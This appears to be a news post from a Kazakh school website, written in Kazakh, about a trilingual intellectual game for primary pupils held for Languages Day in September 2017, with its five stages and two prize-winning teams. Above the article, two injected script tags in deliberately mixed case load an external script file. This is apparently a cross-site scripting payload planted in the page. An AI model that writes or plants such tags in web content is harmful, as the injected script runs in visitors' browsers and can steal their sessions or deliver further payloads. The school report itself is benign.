<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.09.2017

«Үш тұғырлы тілдің әлемі» зияткерлік ойын

Ғ. Әбдірахманұлы атындағы Қима орта мектебінде қыркүйек айының 08.09-15.09 аралығында ҚР халқының Тілдер күніне арналған шаралар өткізілді. Осы іс-шараға орай бастауыш сыныптар арасында ағылшын пәнінің мұғалімі Варанкин Евгений Юрьевич «Үш тұғырлы тіл әлемінде» атты зияткерлік ойын өткізді.

Ойынның мақсаты: оқушылардың тілдерді оқуға қызығушылығын арттыру, сөздік қорларын молайту, топта жұмыс істеу дағдыларын дамыту. «Білімділер», «Қырандар» деп екі топ болып жұмыс жасады. Ойын V кезеңнен тұрды.

І кезең қазақ тілі ( жұмбақ оқылды, оқушылар жауабын айта білді).

ІІ кезең русский язык ( орыс тілінде жұмбақ оқылып жауабын оқушылар тапты).

ІІІ кезең кемпірқосақ (түстер үш тілде айтылды).

IV кезең математика (есептер шығарылды).

V кезең «Кім жылдам?»

Онкүндіктің жабылу рәсімінде, ойынға белсене қатысқан «Білімділер» мен «Қырандар» топтарын марапаттады.

Бастауыш сынып мұғалімі: Макишева К.Д

Просмотров: 688


Пікір қосу



Деректерді қолтаңбаға қосу